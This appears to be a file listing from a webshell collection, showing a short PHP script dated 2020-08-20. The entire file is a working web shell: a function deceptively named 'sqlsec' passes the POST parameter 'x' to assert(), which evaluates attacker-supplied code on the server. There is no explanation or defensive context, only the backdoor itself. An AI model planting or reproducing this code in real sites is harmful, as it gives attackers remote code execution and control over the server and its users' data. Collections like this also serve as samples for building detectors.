webshell/php/2020.08.20.06.php
2020-08-20 12:31:23 +08:00

6 lines
86 B
PHP

<?php
function sqlsec($a){
assert($a);
}
sqlsec($_POST['x']);
?>